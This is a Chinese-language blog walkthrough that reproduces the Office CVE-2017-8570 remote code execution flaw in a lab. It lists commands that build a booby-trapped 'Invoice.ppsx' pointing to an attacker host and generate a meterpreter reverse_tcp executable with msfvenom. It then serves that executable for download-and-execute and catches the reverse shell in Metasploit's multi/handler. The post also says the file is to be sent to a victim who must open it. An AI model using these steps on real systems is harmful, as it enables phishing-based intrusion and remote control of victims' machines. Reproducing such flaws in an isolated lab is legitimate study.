Office CVE-2017-8570远程代码执行漏洞复现

2024-06-01 17:38

本文主要是介绍Office CVE-2017-8570远程代码执行漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Office CVE-2017-8570远程代码执行漏洞复现

漏洞影响版本

  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2 (32-bit editions)
  • Microsoft Office 2010 Service Pack 2 (64-bit editions)
  • Microsoft Office 2013 RT Service Pack 1
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)
复现环境:
  • 攻击机:系统:kallinux 32位 IP:192.168.1.194 metasploit
  • 目标机:系统:window7旗舰版 IP:192.168.1.133 Microsoft Office 2013

1、生成恶意文件:

python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.1.194/logo.doc
注意:

  • 1、这里的IP是攻击机IP
  • 2、Invoice.ppsx为生成的恶意文件
  • 3、这里可能会报一个错误:
    IOError: [Errno 2] No such file or directory: ‘template/template.ppsx’
    image
    这里郁闷了很久,各种查资料,才知道这里是文件中的一个路径有问题!
    在文件cve-2017-8570_toolkit.py中有一个文件路径需要修改:
    image
    修改后为此文件(template.ppsx)所在路径:
    如我现在的文件为/root/Office8570-master/文件夹下,所以修改成:

image
接下来执行第一步生成恶意文件命令就不会报错了!
image
生成的恶意文件:
image


2、生成反弹shell文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.194 LPORT=6666 -f exe > shell.exe
设置反弹shell的ip192.168.1.194,和监听端口6666
命令执行成功:
image
生成的shell文件
image
当然了,如果目标机是64位机器那么需要执行不一样的命令:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.103 LPORT=6666 -f exe > shell64.exe
命令执行成功
image
生成shell64文件
image


### 3、监听会话(来自ppsx执行反弹shell)

执行命令(32位目标机):
python cve-2017-8570_toolkit.py -M exp -e http://192.168.1.194/shell.exe -l shell.exe
过脚本在80端口监听,等待接收ppsx请求并下载执行的反弹木马
命令执行成功监听服务启动:
image
接下来进入Metasploit,新建一个Kali 192.168.1.194的连接,设置相关参数,接受返回的Shell:
msfconsole
image

msf > use exploit/multi/handler
image
msf > set LHOST 192.168.1.194
image
msf > set LPORT 6666
image
msf > set PAYLOAD windows/meterpreter/reverse_tcp
image
msf > exploit
image

同样,这里攻击64位操作系统的时候,需执行如下命令(这里我没有执行):
msf > set pauload windows/x64/meterpreter/reverse_tcp


### 4、漏洞执行

最后将我们生成好的恶意文件发送给目标机,并让目标机打开文件。我这里是kalinux运行在虚拟机中,所以讲恶意文件直接拖到win7中,然后执行文件就行了。
image
文件运行(如果将文件发给别人,必须要让别人打开此文件,否则不可成功,另外图没有截好T_T)
image
Shell反弹显示get到了目标机
image
然后再meterpreter中可以直接执行ls命令,如下:
image
可见win7桌面上的文件:
我们还可以直接执行shell命令,那么就可以直接执行win7下的DOS命令了:
image



这篇关于Office CVE-2017-8570远程代码执行漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1021679

相关文章

java程序远程debug原理与配置全过程

《java程序远程debug原理与配置全过程》文章介绍了Java远程调试的JPDA体系,包含JVMTI监控JVM、JDWP传输调试命令、JDI提供调试接口,通过-Xdebug、-Xrunjdwp参数配... 目录背景组成模块间联系IBM对三个模块的详细介绍编程使用总结背景日常工作中,每个程序员都会遇到bu

Java服务实现开启Debug远程调试

《Java服务实现开启Debug远程调试》文章介绍如何通过JVM参数开启Java服务远程调试,便于在线上排查问题,在IDEA中配置客户端连接,实现无需频繁部署的调试,提升效率... 目录一、背景二、相关图示说明三、具体操作步骤1、服务端配置2、客户端配置总结一、背景日常项目中,通常我们的代码都是部署到远程

Java实现远程执行Shell指令

《Java实现远程执行Shell指令》文章介绍使用JSch在SpringBoot项目中实现远程Shell操作,涵盖环境配置、依赖引入及工具类编写,详解分号和双与号执行多指令的区别... 目录软硬件环境说明编写执行Shell指令的工具类总结jsch(Java Secure Channel)是SSH2的一个纯J

修复已被利用的高危漏洞! macOS Sequoia 15.6.1发布

《修复已被利用的高危漏洞!macOSSequoia15.6.1发布》苹果公司于今日发布了macOSSequoia15.6.1更新,这是去年9月推出的macOSSequoia操作... MACOS Sequoia 15.6.1 正式发布!此次更新修复了一个已被黑客利用的严重安全漏洞,并解决了部分中文用户反馈的

Mac电脑如何通过 IntelliJ IDEA 远程连接 MySQL

《Mac电脑如何通过IntelliJIDEA远程连接MySQL》本文详解Mac通过IntelliJIDEA远程连接MySQL的步骤,本文通过图文并茂的形式给大家介绍的非常详细,感兴趣的朋友跟... 目录MAC电脑通过 IntelliJ IDEA 远程连接 mysql 的详细教程一、前缀条件确认二、打开 ID

kkFileView在线预览office的常见问题以及解决方案

《kkFileView在线预览office的常见问题以及解决方案》kkFileView在线预览Office常见问题包括base64编码配置、Office组件安装、乱码处理及水印添加,解决方案涉及版本适... 目录kkFileView在线预览office的常见问题1.base642.提示找不到OFFICE组件

一文详解Git中分支本地和远程删除的方法

《一文详解Git中分支本地和远程删除的方法》在使用Git进行版本控制的过程中,我们会创建多个分支来进行不同功能的开发,这就容易涉及到如何正确地删除本地分支和远程分支,下面我们就来看看相关的实现方法吧... 目录技术背景实现步骤删除本地分支删除远程www.chinasem.cn分支同步删除信息到其他机器示例步骤

C#实现将Office文档(Word/Excel/PDF/PPT)转为Markdown格式

《C#实现将Office文档(Word/Excel/PDF/PPT)转为Markdown格式》Markdown凭借简洁的语法、优良的可读性,以及对版本控制系统的高度兼容性,逐渐成为最受欢迎的文档格式... 目录为什么要将文档转换为 Markdown 格式使用工具将 Word 文档转换为 Markdown(.

Python远程控制MySQL的完整指南

《Python远程控制MySQL的完整指南》MySQL是最流行的关系型数据库之一,Python通过多种方式可以与MySQL进行交互,下面小编就为大家详细介绍一下Python操作MySQL的常用方法和最... 目录1. 准备工作2. 连接mysql数据库使用mysql-connector使用PyMySQL3.

Linux使用scp进行远程目录文件复制的详细步骤和示例

《Linux使用scp进行远程目录文件复制的详细步骤和示例》在Linux系统中,scp(安全复制协议)是一个使用SSH(安全外壳协议)进行文件和目录安全传输的命令,它允许在远程主机之间复制文件和目录,... 目录1. 什么是scp?2. 语法3. 示例示例 1: 复制本地目录到远程主机示例 2: 复制远程主